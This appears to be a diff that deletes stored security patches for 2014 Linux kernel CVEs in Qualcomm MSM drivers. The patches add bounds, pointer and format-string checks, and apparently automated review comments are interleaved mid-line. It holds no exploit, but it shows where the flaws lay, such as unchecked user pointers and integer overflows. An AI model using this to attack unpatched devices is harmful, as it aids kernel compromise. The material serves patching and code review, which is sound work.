if (ret) { -+ pr_err("%s: invalid csc data\n", __func__); -+ break; -+ } - ret = mdp3_csc_config(mdp3_session, - &(mdp_pp.data.csc_cfg_data)); - break; -diff --git a/drivers/video/msm/mdss/mdp3_dma.c b/drivers/video/msm/mdss/mdp3_dma.c -index 3e1bf5d..d3f1538 100644 ---- a/drivers/video/msm/mdss/mdp3_dma.c -+++ b/drivers/video/msm/mdss/mdp3_dma.c -@@ -497,7 +497,7 @@ static int mdp3_dmap_histo_config(struct mdp3_dma *dma, - struct mdp3_dma_histogram_config *histo_config) - { - unsigned long flag; -- u32 histo_bit_mask, 
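Review bot: The three validators added in the first mdp3_ctrl.c hunk (mdp3_validate_start_req, mdp3_validate_scale_config, mdp3_validate_csc_data) are given external linkage although the visible callers are in the same file; `static int mdp3_validate_start_req(struct mdp_histogram_start_req *req)` and likewise for the other two keeps them out of the global namespace. mdp3_validate_csc_data also hard-codes the loop bounds 9, 3 and 6; if the csc_data members are fixed-size arrays (their declarations are not in the hunk), `ARRAY_SIZE(data->csc_data.csc_mv)` and friends would keep the check in step with the struct. The checks are upper bounds only, so if any of these fields is signed a negative value passes; that should be confirmed against the struct definition.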
histo_control; -+ u32 histo_bit_mask = 0, histo_control = 0; - u32 histo_isr_mask = MDP3_DMA_P_HIST_INTR_HIST_DONE_BIT | - MDP3_DMA_P_HIST_INTR_RESET_DONE_BIT; - -diff --git a/drivers/video/msm/mdss/mdp3_dma.h b/drivers/video/msm/mdss/mdp3_dma.h -index e4a28dc..7dd6ba7 100644 ---- a/drivers/video/msm/mdss/mdp3_dma.h -+++ b/drivers/video/msm/mdss/mdp3_dma.h -@@ -16,6 +16,12 @@ - - #include - -+#define MDP_HISTOGRAM_BL_SCALE_MAX 1024 -+#define MDP_HISTOGRAM_BL_LEVEL_MAX 255 -+#define MDP_HISTOGRAM_FRAME_COUNT_MAX 0x20 -+#define MDP_HISTOGRAM_BIT_MASK_MAX 0x4 -+#define MDP_HISTOGRAM_CSC_MATRIX_MAX 0x2000 -+#define MDP_HISTOGRAM_CSC_VECTOR_MAX 0x200 - #define MDP_HISTOGRAM_BIN_NUM 32 - #define MDP_LUT_SIZE 256 - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9880/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9880/ANY/0001.patch deleted file mode 100644 index 800fe67c..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9880/ANY/0001.patch +++ /dev/null 
@@ -1,35 +0,0 @@ -From f2a3f5e63e15e97a66e8f5a300457378bcb89d9c Mon Sep 17 00:00:00 2001 -From: Deepak Verma -Date: Mon, 21 Oct 2013 17:37:11 +0530 -Subject: msm: vidc: Check validity of userspace address - -Before writing to a userspace address, verification -of the validity of user space address is required. - -Change-Id: I9141e44a6c11aaf3f4d57c08bb0dd26a7b214f34 -CRs-fixed: 556356 -Signed-off-by: Deepak Verma ---- - drivers/video/msm/vidc/common/enc/venc.c | 6 ++++++ - 1 file changed, 6 insertions(+) - -diff --git a/drivers/video/msm/vidc/common/enc/venc.c b/drivers/video/msm/vidc/common/enc/venc.c -index 1801461..707d948 100644 ---- a/drivers/video/msm/vidc/common/enc/venc.c -+++ b/drivers/video/msm/vidc/common/enc/venc.c -@@ -1414,6 +1414,12 @@ static long vid_enc_ioctl(struct file *file, - return -EFAULT; - - DBG("VEN_IOCTL_GET_SEQUENCE_HDR\n"); -+ if (!access_ok(VERIFY_WRITE, seq_header.hdrbufptr, -+ seq_header.bufsize)) { -+ ERR("VEN_IOCTL_GET_SEQUENCE_HDR:"\ -+ " Userspace address verification failed.\n"); -+ return -EFAULT; -+ } - result = vid_enc_get_sequence_header(client_ctx, - &seq_header); - if (!result) { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9881/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9881/ANY/0001.patch deleted file mode 100644 index 62ba9399..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9881/ANY/0001.patch +++ /dev/null 
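Review bot: The access_ok() check added in the VEN_IOCTL_GET_SEQUENCE_HDR case only confirms that `seq_header.hdrbufptr` plus `seq_header.bufsize` lies in the user address range; it does not make a later direct store safe if the page is unmapped or read-only. The write itself happens inside vid_enc_get_sequence_header, outside this hunk, so it should be confirmed that it goes through `copy_to_user()` and that its return value is checked. If it does, this pre-check is redundant; if it does not, the pre-check is not sufficient on its own.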
@@ -1,63 +0,0 @@ -From ba3f404a10b3bb7e9c20440837df3cd35c5d0c4b Mon Sep 17 00:00:00 2001 -From: Ayaz Ahmad -Date: Thu, 31 Oct 2013 19:08:05 +0530 -Subject: radio: iris: Prevent probable overflow - -casting a unsigned int into an integer, integer to -unsigned int may cause buffer overflow. - -Change-Id: I54be4d4c5470616a59a772c587fe6d5f32575c32 -CRs-Fixed: 539008 -Signed-off-by: Ayaz Ahmad ---- - drivers/media/radio/radio-iris.c | 14 ++++++++++---- - 1 file changed, 10 insertions(+), 4 deletions(-) - -diff --git a/drivers/media/radio/radio-iris.c b/drivers/media/radio/radio-iris.c -index bfb1088..12fd7cf 100644 ---- a/drivers/media/radio/radio-iris.c -+++ b/drivers/media/radio/radio-iris.c -@@ -3032,7 +3032,7 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv, - struct v4l2_ext_controls *ctrl) - { - int retval = 0; -- int bytes_to_copy; -+ size_t bytes_to_copy; - struct hci_fm_tx_ps tx_ps; - struct hci_fm_tx_rt tx_rt; - struct hci_fm_def_data_wr_req default_data; -@@ -3041,14 +3041,20 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv, - struct iris_device *radio = video_get_drvdata(video_devdata(file)); - char *data = NULL; - -+ if ((ctrl == NULL) || (ctrl->controls == NULL) -+ || (ctrl->count == 0)) { -+ retval = -EINVAL; -+ return retval; -+ } -+ - switch ((ctrl->controls[0]).id) { - case V4L2_CID_RDS_TX_PS_NAME: - FMDBG("In V4L2_CID_RDS_TX_PS_NAME\n"); - /*Pass a sample PS string */ - - memset(tx_ps.ps_data, 0, MAX_PS_LENGTH); -- bytes_to_copy = min((int)(ctrl->controls[0]).size, -- MAX_PS_LENGTH); -+ bytes_to_copy = min_t(size_t, ctrl->controls[0].size, -+ MAX_PS_LENGTH); - data = (ctrl->controls[0]).string; - - if (copy_from_user(tx_ps.ps_data, -@@ -3065,7 +3071,7 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv, - break; - case V4L2_CID_RDS_TX_RADIO_TEXT: - bytes_to_copy = -- min((int)(ctrl->controls[0]).size, MAX_RT_LENGTH); -+ min_t(size_t, (ctrl->controls[0]).size, MAX_RT_LENGTH); - data = 
(ctrl->controls[0]).string; - - memset(tx_rt.rt_data, 0, MAX_RT_LENGTH); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9882/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9882/ANY/0001.patch deleted file mode 100644 index 23829e98..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9882/ANY/0001.patch +++ /dev/null 
@@ -1,54 +0,0 @@ -From 3a4ebaac557a9e3fbcbab4561650abac8298a4d9 Mon Sep 17 00:00:00 2001 -From: Satish Kodishala -Date: Thu, 10 Oct 2013 15:44:11 +0530 -Subject: radio: iris: Checking if driver's buffer is large enough. - -Checking if driver's buffer is large enough to copy -the data from user space. - -Change-Id: I7b4eed81cf77ce2973669ce18ccd95a5df397d82 -CRs-fixed: 552329 -Signed-off-by: Satish Kodishala ---- - drivers/media/radio/radio-iris.c | 23 ++++++++++++++++++----- - 1 file changed, 18 insertions(+), 5 deletions(-) - -diff --git a/drivers/media/radio/radio-iris.c b/drivers/media/radio/radio-iris.c -index 5e056be..a9e25bd 100644 ---- a/drivers/media/radio/radio-iris.c -+++ b/drivers/media/radio/radio-iris.c -@@ -3472,13 +3472,26 @@ static int iris_vidioc_s_ctrl(struct file *file, void *priv, - radio->riva_data_req.cmd_params.start_addr = ctrl->value; - break; - case V4L2_CID_PRIVATE_IRIS_RIVA_ACCS_LEN: -- radio->riva_data_req.cmd_params.length = ctrl->value; -+ if ((ctrl->value > 0) && -+ (ctrl->value <= MAX_RIVA_PEEK_RSP_SIZE)) { -+ radio->riva_data_req.cmd_params.length = ctrl->value; -+ } else { -+ FMDERR("Length %d is more than the buffer size %d\n", -+ ctrl->value, MAX_RIVA_PEEK_RSP_SIZE); -+ retval = -EINVAL; -+ } - break; - case V4L2_CID_PRIVATE_IRIS_RIVA_POKE: -- memcpy(radio->riva_data_req.data, (void *)ctrl->value, -- radio->riva_data_req.cmd_params.length); -- radio->riva_data_req.cmd_params.subopcode = RIVA_POKE_OPCODE; -- retval = hci_poke_data(&radio->riva_data_req , radio->fm_hdev); -+ if (radio->riva_data_req.cmd_params.length <= MAX_RIVA_PEEK_RSP_SIZE) { -+ memcpy(radio->riva_data_req.data, (void *)ctrl->value, -+ radio->riva_data_req.cmd_params.length); -+ radio->riva_data_req.cmd_params.subopcode = RIVA_POKE_OPCODE; -+ retval = hci_poke_data(&radio->riva_data_req , radio->fm_hdev); -+ } else { -+ FMDERR("Can not copy into driver's buffer. 
Length %d is more than" -+ "the buffer size %d\n", ctrl->value, MAX_RIVA_PEEK_RSP_SIZE); -+ retval = -EINVAL; -+ } - break; - case V4L2_CID_PRIVATE_IRIS_SSBI_ACCS_ADDR: - radio->ssbi_data_accs.start_addr = ctrl->value; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9882/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9882/ANY/0002.patch deleted file mode 100644 index a9a0df43..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9882/ANY/0002.patch +++ /dev/null 
@@ -1,48 +0,0 @@ -From 0f6afe815b1b3f920f3502be654c848bdfe5ef38 Mon Sep 17 00:00:00 2001 -From: Ayaz Ahmad -Date: Tue, 8 Oct 2013 15:56:04 +0530 -Subject: radio: iris: Use kernel API to copy data from user space - -Use copy_from_user kernel api to copy any data from user space -to kernel space. - -Change-Id: Ia3b7bb0f98180bd8792c1c18e930cb5609b8dc82 -CRs-Fixed: 540320 -Signed-off-by: Ayaz Ahmad ---- - drivers/media/radio/radio-iris.c | 16 ++++++++++++---- - 1 file changed, 12 insertions(+), 4 deletions(-) - -diff --git a/drivers/media/radio/radio-iris.c b/drivers/media/radio/radio-iris.c -index a554749..3bac006 100644 ---- a/drivers/media/radio/radio-iris.c -+++ b/drivers/media/radio/radio-iris.c -@@ -3623,13 +3623,21 @@ static int iris_vidioc_s_ctrl(struct file *file, void *priv, - break; - case V4L2_CID_PRIVATE_IRIS_RIVA_POKE: - if (radio->riva_data_req.cmd_params.length <= MAX_RIVA_PEEK_RSP_SIZE) { -- memcpy(radio->riva_data_req.data, (void *)ctrl->value, -+ retval = copy_from_user(radio->riva_data_req.data, -+ (void *)ctrl->value, - radio->riva_data_req.cmd_params.length); -- radio->riva_data_req.cmd_params.subopcode = RIVA_POKE_OPCODE; -- retval = hci_poke_data(&radio->riva_data_req , radio->fm_hdev); -+ if (retval == 0) { -+ radio->riva_data_req.cmd_params.subopcode = -+ RIVA_POKE_OPCODE; -+ retval = hci_poke_data(&radio->riva_data_req, -+ radio->fm_hdev); -+ } else { -+ retval = -EINVAL; -+ } - } else { - FMDERR("Can not copy into driver's buffer. Length %d is more than" -- "the buffer size %d\n", ctrl->value, MAX_RIVA_PEEK_RSP_SIZE); -+ "the buffer size %d\n", radio->riva_data_req.cmd_params.length, -+ MAX_RIVA_PEEK_RSP_SIZE); - retval = -EINVAL; - } - break; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9883/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9883/ANY/0001.patch deleted file mode 100644 index e062d8fc..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9883/ANY/0001.patch +++ /dev/null 
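Review bot: In the V4L2_CID_PRIVATE_IRIS_RIVA_POKE case a failed `copy_from_user` is mapped to `-EINVAL`; the conventional error for a bad user pointer is `retval = -EFAULT;`, which lets callers tell it apart from the length error in the else branch. The user pointer is passed as `(void *)ctrl->value`; `(void __user *)ctrl->value` keeps sparse able to check the address space. The FMDERR message is built from the adjacent literals `"... is more than"` and `"the buffer size %d\n"` with no space between them, so it prints "more thanthe buffer size".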
@@ -1,58 +0,0 @@ -From cbf79a67348e48557c0d0bb9bc58391b3f84bc46 Mon Sep 17 00:00:00 2001 -From: Katish Paran -Date: Tue, 24 Dec 2013 14:11:41 +0530 -Subject: diag: dci: Safeguard to prevent integer overflow - -At certain point in diag driver there can be integer overflow -thus can lead to memory leak. Added a safegaurd for it. - -Change-Id: I9347405d8f1f95ed42fe0abf35cbf4c362281bdf -CRs-fixed: 565160 -Signed-off-by: Katish Paran ---- - drivers/char/diag/diag_dci.c | 12 +++++++++--- - 1 file changed, 9 insertions(+), 3 deletions(-) - -diff --git a/drivers/char/diag/diag_dci.c b/drivers/char/diag/diag_dci.c -index 2dbb2f5..7772ebe 100644 ---- a/drivers/char/diag/diag_dci.c -+++ b/drivers/char/diag/diag_dci.c -@@ -383,17 +383,23 @@ void extract_dci_events(unsigned char *buf) - - void extract_dci_log(unsigned char *buf) - { -- uint16_t log_code, item_num; -+ uint16_t log_code, item_num, log_length; - uint8_t equip_id, *log_mask_ptr, byte_mask; - unsigned int i, byte_index, byte_offset = 0; - struct diag_dci_client_tbl *entry; - -+ log_length = *(uint16_t *)(buf + 2); - log_code = *(uint16_t *)(buf + 6); - equip_id = LOG_GET_EQUIP_ID(log_code); - item_num = LOG_GET_ITEM_NUM(log_code); - byte_index = item_num/8 + 2; - byte_mask = 0x01 << (item_num % 8); - -+ if (log_length > USHRT_MAX - 4) { -+ pr_err("diag: Integer overflow in %s, log_len:%d", -+ __func__, log_length); -+ return; -+ } - byte_offset = (equip_id * 514) + byte_index; - if (byte_offset >= DCI_LOG_MASK_SIZE) { - pr_err("diag: Invalid byte_offset %d in dci log\n", -@@ -430,8 +436,8 @@ void extract_dci_log(unsigned char *buf) - *(int *)(entry->dci_data+entry->data_len) = - DCI_LOG_TYPE; - memcpy(entry->dci_data + entry->data_len + 4, -- buf + 4, *(uint16_t *)(buf + 2)); -- entry->data_len += 4 + *(uint16_t *)(buf + 2); -+ buf + 4, log_length); -+ entry->data_len += 4 + log_length; - } - mutex_unlock(&entry->data_mutex); - mutex_unlock(&dci_health_mutex); --- -cgit v1.1 - 
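Review bot: The new `log_length > USHRT_MAX - 4` test in extract_dci_log only guards the 16-bit sum; it does not by itself bound `entry->data_len + 4 + log_length` against the size of `entry->dci_data`, which the later `memcpy` writes into. That capacity check is outside this hunk, and it should use the cached `log_length` rather than re-reading `*(uint16_t *)(buf + 2)`, so that the length checked is the length copied. The added `pr_err` is missing its trailing newline: `"diag: Integer overflow in %s, log_len:%d\n"`.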
diff --git a/Patches/Linux_CVEs/CVE-2014-9884/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9884/ANY/0001.patch deleted file mode 100644 index a0d6afc1..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9884/ANY/0001.patch +++ /dev/null 
@@ -1,151 +0,0 @@ -From f4948193c46f75e16d4382c4472485ab12b7bd17 Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Mon, 25 Nov 2013 13:05:35 -0800 -Subject: qseecom: Add checks for user space buffer pointers - -Validate pointers send from user space and pointers -embedded within the mesasge sent from user space. - -Change-Id: I1be54924ef3d301908af6e8d4e6506f2aa7f6428 -Signed-off-by: Mona Hossain -Signed-off-by: Zhen Kong ---- - drivers/misc/qseecom.c | 61 +++++++++++++++++++++++++++++++++++++++++++++++++- - 1 file changed, 60 insertions(+), 1 deletion(-) - -diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c -index 0bc18fb..c5c0ce8 100644 ---- a/drivers/misc/qseecom.c -+++ b/drivers/misc/qseecom.c -@@ -99,7 +99,7 @@ static DEFINE_MUTEX(clk_access_lock); - struct qseecom_registered_listener_list { - struct list_head list; - struct qseecom_register_listener_req svc; -- u8 *sb_reg_req; -+ uint32_t user_virt_sb_base; - u8 *sb_virt; - s32 sb_phys; - size_t sb_length; -@@ -319,6 +319,10 @@ static int qseecom_register_listener(struct qseecom_dev_handle *data, - pr_err("copy_from_user failed\n"); - return ret; - } -+ if (!access_ok(VERIFY_WRITE, (void __user *)rcvd_lstnr.virt_sb_base, -+ rcvd_lstnr.sb_size)) -+ return -EFAULT; -+ - data->listener.id = 0; - if (!__qseecom_is_svc_unique(data, &rcvd_lstnr)) { - pr_err("Service is not unique and is already registered\n"); -@@ -336,6 +340,7 @@ static int qseecom_register_listener(struct qseecom_dev_handle *data, - - new_entry->svc.listener_id = rcvd_lstnr.listener_id; - new_entry->sb_length = rcvd_lstnr.sb_size; -+ new_entry->user_virt_sb_base = rcvd_lstnr.virt_sb_base; - if (__qseecom_set_sb_memory(new_entry, data, &rcvd_lstnr)) { - pr_err("qseecom_set_sb_memoryfailed\n"); - kzfree(new_entry); -@@ -446,6 +451,10 @@ static int qseecom_set_client_mem_param(struct qseecom_dev_handle *data, - req.ifd_data_fd, req.sb_len, req.virt_sb_base); - return -EFAULT; - } -+ if (!access_ok(VERIFY_WRITE, (void __user 
*)req.virt_sb_base, -+ req.sb_len)) -+ return -EFAULT; -+ - /* Get the handle of the shared fd */ - data->client.ihandle = ion_import_dma_buf(qseecom.ion_clnt, - req.ifd_data_fd); -@@ -861,6 +870,13 @@ static uint32_t __qseecom_uvirt_to_kphys(struct qseecom_dev_handle *data, - return data->client.sb_phys + (virt - data->client.user_virt_sb_base); - } - -+static uint32_t __qseecom_uvirt_to_kvirt(struct qseecom_dev_handle *data, -+ uint32_t virt) -+{ -+ return (uint32_t)data->client.sb_virt + -+ (virt - data->client.user_virt_sb_base); -+} -+ - int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr, - struct qseecom_send_svc_cmd_req *req_ptr, - struct qseecom_client_send_service_ireq *send_svc_ireq_ptr) -@@ -1269,6 +1285,24 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data, - pr_err("copy_from_user failed\n"); - return ret; - } -+ -+ if (req.cmd_req_buf == NULL || req.resp_buf == NULL) { -+ pr_err("cmd buffer or response buffer is null\n"); -+ return -EINVAL; -+ } -+ if (((uint32_t)req.cmd_req_buf < data->client.user_virt_sb_base) || -+ ((uint32_t)req.cmd_req_buf >= (data->client.user_virt_sb_base + -+ data->client.sb_length))) { -+ pr_err("cmd buffer address not within shared bufffer\n"); -+ return -EINVAL; -+ } -+ -+ if (((uint32_t)req.resp_buf < data->client.user_virt_sb_base) || -+ ((uint32_t)req.resp_buf >= (data->client.user_virt_sb_base + -+ data->client.sb_length))){ -+ pr_err("response buffer address not within shared bufffer\n"); -+ return -EINVAL; -+ } - send_cmd_req.cmd_req_buf = req.cmd_req_buf; - send_cmd_req.cmd_req_len = req.cmd_req_len; - send_cmd_req.resp_buf = req.resp_buf; -@@ -1282,6 +1316,11 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data, - return -EINVAL; - } - } -+ req.cmd_req_buf = (void *)__qseecom_uvirt_to_kvirt(data, -+ (uint32_t)req.cmd_req_buf); -+ req.resp_buf = (void *)__qseecom_uvirt_to_kvirt(data, -+ (uint32_t)req.resp_buf); -+ - ret = __qseecom_update_cmd_buf(&req, false, 
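Review bot: The range checks added to qseecom_send_modfd_cmd test only that the start of `req.cmd_req_buf` and `req.resp_buf` falls inside `[user_virt_sb_base, user_virt_sb_base + sb_length)`; nothing in the hunk checks that `cmd_req_len` and `resp_len` keep the end of each buffer inside the shared region. After the translation with __qseecom_uvirt_to_kvirt these become kernel pointers, so the end should be bounded too, for example `req.cmd_req_len > data->client.sb_length - ((uint32_t)req.cmd_req_buf - data->client.user_virt_sb_base)` returning -EINVAL. The same start-only check is used for `resp.resp_buf_ptr` in qseecom_send_modfd_resp. The sum `user_virt_sb_base + sb_length` is computed in 32 bits and can wrap, and the `(uint32_t)` pointer casts assume a 32-bit kernel; length validation may exist outside these hunks and should be confirmed.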
data, false); - if (ret) - return ret; -@@ -1877,11 +1916,20 @@ static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data, - { - struct qseecom_send_modfd_listener_resp resp; - int i; -+ struct qseecom_registered_listener_list *this_lstnr = NULL; - - if (copy_from_user(&resp, argp, sizeof(resp))) { - pr_err("copy_from_user failed"); - return -EINVAL; - } -+ this_lstnr = __qseecom_find_svc(data->listener.id); -+ if (this_lstnr == NULL) -+ return -EINVAL; -+ -+ if (resp.resp_buf_ptr == NULL) { -+ pr_err("Invalid resp_buf_ptr\n"); -+ return -EINVAL; -+ } - /* validate offsets */ - for (i = 0; i < MAX_ION_FD; i++) { - if (resp.ifd_data[i].cmd_buf_offset >= resp.resp_len) { -@@ -1890,6 +1938,17 @@ static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data, - return -EINVAL; - } - } -+ -+ if (((uint32_t)resp.resp_buf_ptr < -+ this_lstnr->user_virt_sb_base) -+ || ((uint32_t)resp.resp_buf_ptr >= -+ (this_lstnr->user_virt_sb_base + -+ this_lstnr->sb_length))) { -+ pr_err("resp_buf_ptr address not within shared buffer\n"); -+ return -EINVAL; -+ } -+ resp.resp_buf_ptr = (uint32_t)this_lstnr->sb_virt + -+ (resp.resp_buf_ptr - this_lstnr->user_virt_sb_base); - __qseecom_update_cmd_buf(&resp, false, data, true); - qseecom.send_resp_flag = 1; - wake_up_interruptible(&qseecom.send_resp_wq); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9885/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9885/ANY/0001.patch deleted file mode 100644 index ffcb5526..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9885/ANY/0001.patch +++ /dev/null 
@@ -1,30 +0,0 @@ -From a1d5a4cbd5aa8656bc23b40c7cc43941e10f89c3 Mon Sep 17 00:00:00 2001 -From: Dipen Parmar -Date: Fri, 18 Oct 2013 15:53:36 +0530 -Subject: thermal: qpnp-adc-tm: Fix format specifier in snprintf - -Add format specifier in snprintf to avoid security -vulnerability issues. - -Change-Id: I6ea67633348341267e0646912a6b428709410c78 -Signed-off-by: Dipen Parmar ---- - drivers/thermal/qpnp-adc-tm.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/drivers/thermal/qpnp-adc-tm.c b/drivers/thermal/qpnp-adc-tm.c -index a90a042..b203ae3 100644 ---- a/drivers/thermal/qpnp-adc-tm.c -+++ b/drivers/thermal/qpnp-adc-tm.c -@@ -1886,7 +1886,7 @@ static int qpnp_adc_tm_probe(struct spmi_device *spmi) - pr_debug("thermal node%x\n", btm_channel_num); - chip->sensor[sen_idx].mode = THERMAL_DEVICE_DISABLED; - chip->sensor[sen_idx].thermal_node = true; -- snprintf(name, sizeof(name), -+ snprintf(name, sizeof(name), "%s", - chip->adc->adc_channels[sen_idx].name); - chip->sensor[sen_idx].meas_interval = - QPNP_ADC_TM_MEAS_INTERVAL; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9886/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9886/ANY/0001.patch deleted file mode 100644 index 15191d3a..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9886/ANY/0001.patch +++ /dev/null 
@@ -1,178 +0,0 @@
-From 80be0e249c906704085d13d4ae446f73913fc225 Mon Sep 17 00:00:00 2001
-From: Baruch Eruchimovitch
-Date: Mon, 14 Oct 2013 15:49:41 +0300
-Subject: msm: ultrasound: add verifications of some input parameters
-
-Some security vulnerabilities were found.
-To fix them, additional verifications of some input parameters
-are required.
-
-CRs-Fixed: 554575, 554560, 555030
-Change-Id: Ie87a433bcda89c3e462cfd511c168e8306056020
-Signed-off-by: Baruch Eruchimovitch
----
- arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c | 82 ++++++++++++++++++------------
- 1 file changed, 49 insertions(+), 33 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c b/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-index 1ea213a..01fcfd9 100644
---- a/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-+++ b/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-@@ -51,6 +51,11 @@
- #define Y_IND 1
- #define Z_IND 2
-
-+/* Shared memory limits */
-+/* max_buf_size = (port_size(65535*2) * port_num(8) * group_size(3) */
-+#define USF_MAX_BUF_SIZE 3145680
-+#define USF_MAX_BUF_NUM 32
-+
- /* Place for opreation result, received from QDSP6 */
- #define APR_RESULT_IND 1
-
-@@ -436,6 +441,15 @@ static int config_xx(struct usf_xx_type *usf_xx, struct us_xx_info_type *config)
- (config == NULL))
- return -EINVAL;
-
-+ if ((config->buf_size == 0) ||
-+ (config->buf_size > USF_MAX_BUF_SIZE) ||
-+ (config->buf_num == 0) ||
-+ (config->buf_num > USF_MAX_BUF_NUM)) {
-+ pr_err("%s: wrong params: buf_size=%d; buf_num=%d\n",
-+ __func__, config->buf_size, config->buf_num);
-+ return -EINVAL;
-+ }
-+
- data_map_size = sizeof(usf_xx->encdec_cfg.cfg_common.data_map);
- min_map_size = min(data_map_size, config->port_cnt);
-
-@@ -748,6 +762,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- {
- uint32_t timeout = 0;
- struct us_detect_info_type detect_info;
-+ struct usm_session_cmd_detect_info *p_allocated_memory = NULL;
- struct usm_session_cmd_detect_info usm_detect_info;
- struct usm_session_cmd_detect_info *p_usm_detect_info =
- &usm_detect_info;
-@@ -774,12 +789,13 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- uint8_t *p_data = NULL;
-
- detect_info_size += detect_info.params_data_size;
-- p_usm_detect_info = kzalloc(detect_info_size, GFP_KERNEL);
-- if (p_usm_detect_info == NULL) {
-+ p_allocated_memory = kzalloc(detect_info_size, GFP_KERNEL);
-+ if (p_allocated_memory == NULL) {
- pr_err("%s: detect_info[%d] allocation failed\n",
- __func__, detect_info_size);
- return -ENOMEM;
- }
-+ p_usm_detect_info = p_allocated_memory;
- p_data = (uint8_t *)p_usm_detect_info +
- sizeof(struct usm_session_cmd_detect_info);
-
-@@ -789,7 +805,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- if (rc) {
- pr_err("%s: copy params from user; rc=%d\n",
- __func__, rc);
-- kfree(p_usm_detect_info);
-+ kfree(p_allocated_memory);
- return -EFAULT;
- }
- p_usm_detect_info->algorithm_cfg_size =
-@@ -806,9 +822,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- p_usm_detect_info,
- detect_info_size);
- if (rc || (detect_info.detect_timeout == USF_NO_WAIT_TIMEOUT)) {
-- if (detect_info_size >
-- sizeof(struct usm_session_cmd_detect_info))
-- kfree(p_usm_detect_info);
-+ kfree(p_allocated_memory);
- return rc;
- }
-
-@@ -828,25 +842,24 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- USF_US_DETECT_UNDEF),
- timeout);
- /* In the case of timeout, "no US" is assumed */
-- if (rc < 0) {
-+ if (rc < 0)
- pr_err("%s: Getting US detection failed rc[%d]\n",
- __func__, rc);
-- return rc;
-- }
--
-- usf->usf_rx.us_detect_type = usf->usf_tx.us_detect_type;
-- detect_info.is_us = (usf_xx->us_detect_type == USF_US_DETECT_YES);
-- rc = copy_to_user((void __user *)arg,
-- &detect_info,
-- sizeof(detect_info));
-- if (rc) {
-- pr_err("%s: copy detect_info to user; rc=%d\n",
-- __func__, rc);
-- rc = -EFAULT;
-+ else {
-+ usf->usf_rx.us_detect_type = usf->usf_tx.us_detect_type;
-+ detect_info.is_us =
-+ (usf_xx->us_detect_type == USF_US_DETECT_YES);
-+ rc = copy_to_user((void __user *)arg,
-+ &detect_info,
-+ sizeof(detect_info));
-+ if (rc) {
-+ pr_err("%s: copy detect_info to user; rc=%d\n",
-+ __func__, rc);
-+ rc = -EFAULT;
-+ }
- }
-
-- if (detect_info_size > sizeof(struct usm_session_cmd_detect_info))
-- kfree(p_usm_detect_info);
-+ kfree(p_allocated_memory);
-
- return rc;
- } /* usf_set_us_detection */
-@@ -947,16 +960,14 @@ static int usf_set_rx_info(struct usf_type *usf, unsigned long arg)
- if (rc)
- return rc;
-
-- if (usf_xx->buffer_size && usf_xx->buffer_count) {
-- rc = q6usm_us_client_buf_alloc(
-- IN,
-- usf_xx->usc,
-- usf_xx->buffer_size,
-- usf_xx->buffer_count);
-- if (rc) {
-- (void)q6usm_cmd(usf_xx->usc, CMD_CLOSE);
-- return rc;
-- }
-+ rc = q6usm_us_client_buf_alloc(
-+ IN,
-+ usf_xx->usc,
-+ usf_xx->buffer_size,
-+ usf_xx->buffer_count);
-+ if (rc) {
-+ (void)q6usm_cmd(usf_xx->usc, CMD_CLOSE);
-+ return rc;
- }
-
- rc = q6usm_dec_cfg_blk(usf_xx->usc,
-@@ -1175,10 +1186,15 @@ static int usf_get_version(unsigned long arg)
- return -EFAULT;
- }
-
-- /* version_info.buf is pointer to place for the version string */
-+ if (version_info.buf_size < sizeof(DRV_VERSION)) {
-+ pr_err("%s: buf_size (%d) < version string size (%d)\n",
-+ __func__, version_info.buf_size, sizeof(DRV_VERSION));
-+ return -EINVAL;
-+ }
-+
- rc = copy_to_user(version_info.pbuf,
- DRV_VERSION,
-- version_info.buf_size);
-+ sizeof(DRV_VERSION));
- if (rc) {
- pr_err("%s: copy to version_info.pbuf; rc=%d\n",
- __func__, rc);
---
-cgit v1.1
-
